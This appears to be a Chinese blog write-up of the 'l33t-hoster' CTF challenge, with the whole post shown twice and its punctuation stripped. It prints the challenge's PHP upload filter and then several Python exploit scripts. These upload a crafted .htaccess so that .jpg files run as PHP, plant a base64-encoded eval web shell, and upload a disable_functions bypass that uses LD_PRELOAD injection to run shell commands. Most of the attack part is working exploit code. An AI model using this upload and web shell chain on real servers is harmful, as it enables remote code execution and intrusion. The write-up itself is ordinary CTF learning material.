这个题做了两天了拼尽全力卡在最后一步 最后决定先放放 感觉是平台flag有点问题之前有个题也是flag为空明天总结下学习的知识点 先记录下做题过程 看了很多大佬的博客先看源代码发现 /?source 看这个页面 发现过滤的代码?phpif (isset($_GET[source]))die(highlight_file(__FILE__));session_start();if (!isset($_SESSION[home])) {$_SESSION[home] bin2hex(random_bytes(20));}$userdir images/{$_SESSION[home]}/;if (!file_exists($userdir)) {mkdir($userdir);}$disallowed_ext array(php,php3,php4,php5,php7,pht,phtm,phtml,phar,phps,);if (isset($_POST[upload])) {if ($_FILES[image][error] ! UPLOAD_ERR_OK) {die(yuuuge fail);}$tmp_name $_FILES[image][tmp_name];$name $_FILES[image][name];$parts explode(., $name);$ext array_pop($parts);if (empty($parts[0])) {array_shift($parts);}if (count($parts) 0) {die(lol filename is empty);}if (in_array($ext, $disallowed_ext, TRUE)) {die(lol nice try, but im not stupid dude...);}$image file_get_contents($tmp_name);if (mb_strpos($image, ?) ! FALSE) {die(why would you need php in a pic.....);}if (!exif_imagetype($tmp_name)) {die(not an image.);}$image_size getimagesize($tmp_name);if ($image_size[0] ! 1337 || $image_size[1] ! 1337) {die(lol noob, your pic is not l33t enough);}$name implode(., $parts);move_uploaded_file($tmp_name, $userdir . $name . . . $ext);}echo h3Your a href$userdirfiles/a:/h3ul;foreach(glob($userdir . *) as $file) {echo lia href$file$file/a/li;}echo /ul;?确实严格 php过滤的差不多我就想到了.htaccess 但要求实在太多了 没啥思路就去看大佬博客了https://blog.csdn.net/Uchiha_duan/article/details/131706725https://blog.csdn.net/mochu7777777/article/details/113772879?ops_request_miscelastic_search_miscrequest_id0a7ed329acd0355e5f9fe1bd6843d728biz_id0utm_mediumdistribute.pc_search_result.none-task-blog-2~all~ElasticSearch~search_v2-1-113772879-null-null.nonecaseutm_terml33t-hosterspm1018.2226.3001.4450#!/usr/bin/env python3 import requests import base64 VALID_WBMP b\x00\x00\x8a\x39\x8a\x39\x0a URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 COOKIES { PHPSESSID : m43d1fip3edjosh48kpjnqj0b2 } def upload_content(name, content): data { image : (name, content, image/png), upload : (None, Submit Query, None) } response requests.post(URL, filesdata, cookiesCOOKIES) HT_ACCESS VALID_WBMP b AddType application/x-httpd-php .jpg php_value auto_append_file php://filter/convert.base64-decode/resourcemochu7.jpg TARGET_FILE VALID_WBMP bAA base64.b64encode(b ?php echo shell ok!; eval($_POST[mochu7]); ? ) upload_content(..htaccess, HT_ACCESS) upload_content(mochu7.jpg, TARGET_FILE) response requests.post(URL /images/ RANDOM_DIRECTORY /mochu7.jpg) print(response.text)先看末 初大佬的博客学习到拿到shell 然后我是在ctf2(前buuctf)上做的也遇到了mochu7var_dump(file_get_contents(/flag));返回bool(false)的问题通过看https://blog.csdn.net/Uchiha_duan/article/details/131706725https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack%202019/l33t-hoster/l33t-hoster.md学习到了LD_PRELOAD注射import requests import base64 URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 url URL /images/ RANDOM_DIRECTORY /mochu7.jpg param {mochu7:move_uploaded_file($_FILES[file][tmp_name],/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc.php);echo ok;var_dump(scandir(/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816));} files [(file,(bypass_disablefunc.php,open(bypass_disablefunc.php,rb),application/octet-stream))] r requests.post(urlurl, filesfiles, dataparam) print(r.text)import requests URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 url URL /images/ RANDOM_DIRECTORY /mochu7.jpg param {mochu7:move_uploaded_file($_FILES[file][tmp_name],/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc_x64.so);echo ok;var_dump(scandir(/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816));} files [(file,(bypass_disablefunc_x64.so,open(bypass_disablefunc_x64.so,rb),application/octet-stream))] r requests.post(urlurl, filesfiles, dataparam) print(r.text)/bypass_disablefunc.php?cmdls /outpath/tmp/xxsopath/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.sohttps://274fcdc69af496cb834ecac5.http-ctf2.dasctf.com/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmdls%20/outpath/tmp/xxsopath/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so再上传官方的pl文件/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmdperl fuck.ploutpath/tmp/xxsopath/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.soimport requests import base64 URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 url URL /images/ RANDOM_DIRECTORY /mochu7.jpg param {mochu7:move_uploaded_file($_FILES[file][tmp_name],/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/fuck.pl);echo ok;var_dump(scandir(/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816));} files [(file,(fuck.pl,open(fuck.pl,rb),application/octet-stream))] r requests.post(urlurl, filesfiles, dataparam) print(r.text)
l33t-hoster
发布时间:2026/6/17 19:30:16
这个题做了两天了拼尽全力卡在最后一步 最后决定先放放 感觉是平台flag有点问题之前有个题也是flag为空明天总结下学习的知识点 先记录下做题过程 看了很多大佬的博客先看源代码发现 /?source 看这个页面 发现过滤的代码?phpif (isset($_GET[source]))die(highlight_file(__FILE__));session_start();if (!isset($_SESSION[home])) {$_SESSION[home] bin2hex(random_bytes(20));}$userdir images/{$_SESSION[home]}/;if (!file_exists($userdir)) {mkdir($userdir);}$disallowed_ext array(php,php3,php4,php5,php7,pht,phtm,phtml,phar,phps,);if (isset($_POST[upload])) {if ($_FILES[image][error] ! UPLOAD_ERR_OK) {die(yuuuge fail);}$tmp_name $_FILES[image][tmp_name];$name $_FILES[image][name];$parts explode(., $name);$ext array_pop($parts);if (empty($parts[0])) {array_shift($parts);}if (count($parts) 0) {die(lol filename is empty);}if (in_array($ext, $disallowed_ext, TRUE)) {die(lol nice try, but im not stupid dude...);}$image file_get_contents($tmp_name);if (mb_strpos($image, ?) ! FALSE) {die(why would you need php in a pic.....);}if (!exif_imagetype($tmp_name)) {die(not an image.);}$image_size getimagesize($tmp_name);if ($image_size[0] ! 1337 || $image_size[1] ! 1337) {die(lol noob, your pic is not l33t enough);}$name implode(., $parts);move_uploaded_file($tmp_name, $userdir . $name . . . $ext);}echo h3Your a href$userdirfiles/a:/h3ul;foreach(glob($userdir . *) as $file) {echo lia href$file$file/a/li;}echo /ul;?确实严格 php过滤的差不多我就想到了.htaccess 但要求实在太多了 没啥思路就去看大佬博客了https://blog.csdn.net/Uchiha_duan/article/details/131706725https://blog.csdn.net/mochu7777777/article/details/113772879?ops_request_miscelastic_search_miscrequest_id0a7ed329acd0355e5f9fe1bd6843d728biz_id0utm_mediumdistribute.pc_search_result.none-task-blog-2~all~ElasticSearch~search_v2-1-113772879-null-null.nonecaseutm_terml33t-hosterspm1018.2226.3001.4450#!/usr/bin/env python3 import requests import base64 VALID_WBMP b\x00\x00\x8a\x39\x8a\x39\x0a URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 COOKIES { PHPSESSID : m43d1fip3edjosh48kpjnqj0b2 } def upload_content(name, content): data { image : (name, content, image/png), upload : (None, Submit Query, None) } response requests.post(URL, filesdata, cookiesCOOKIES) HT_ACCESS VALID_WBMP b AddType application/x-httpd-php .jpg php_value auto_append_file php://filter/convert.base64-decode/resourcemochu7.jpg TARGET_FILE VALID_WBMP bAA base64.b64encode(b ?php echo shell ok!; eval($_POST[mochu7]); ? ) upload_content(..htaccess, HT_ACCESS) upload_content(mochu7.jpg, TARGET_FILE) response requests.post(URL /images/ RANDOM_DIRECTORY /mochu7.jpg) print(response.text)先看末 初大佬的博客学习到拿到shell 然后我是在ctf2(前buuctf)上做的也遇到了mochu7var_dump(file_get_contents(/flag));返回bool(false)的问题通过看https://blog.csdn.net/Uchiha_duan/article/details/131706725https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack%202019/l33t-hoster/l33t-hoster.md学习到了LD_PRELOAD注射import requests import base64 URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 url URL /images/ RANDOM_DIRECTORY /mochu7.jpg param {mochu7:move_uploaded_file($_FILES[file][tmp_name],/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc.php);echo ok;var_dump(scandir(/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816));} files [(file,(bypass_disablefunc.php,open(bypass_disablefunc.php,rb),application/octet-stream))] r requests.post(urlurl, filesfiles, dataparam) print(r.text)import requests URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 url URL /images/ RANDOM_DIRECTORY /mochu7.jpg param {mochu7:move_uploaded_file($_FILES[file][tmp_name],/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc_x64.so);echo ok;var_dump(scandir(/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816));} files [(file,(bypass_disablefunc_x64.so,open(bypass_disablefunc_x64.so,rb),application/octet-stream))] r requests.post(urlurl, filesfiles, dataparam) print(r.text)/bypass_disablefunc.php?cmdls /outpath/tmp/xxsopath/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.sohttps://274fcdc69af496cb834ecac5.http-ctf2.dasctf.com/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmdls%20/outpath/tmp/xxsopath/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so再上传官方的pl文件/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmdperl fuck.ploutpath/tmp/xxsopath/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.soimport requests import base64 URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 url URL /images/ RANDOM_DIRECTORY /mochu7.jpg param {mochu7:move_uploaded_file($_FILES[file][tmp_name],/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/fuck.pl);echo ok;var_dump(scandir(/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816));} files [(file,(fuck.pl,open(fuck.pl,rb),application/octet-stream))] r requests.post(urlurl, filesfiles, dataparam) print(r.text)
)
)
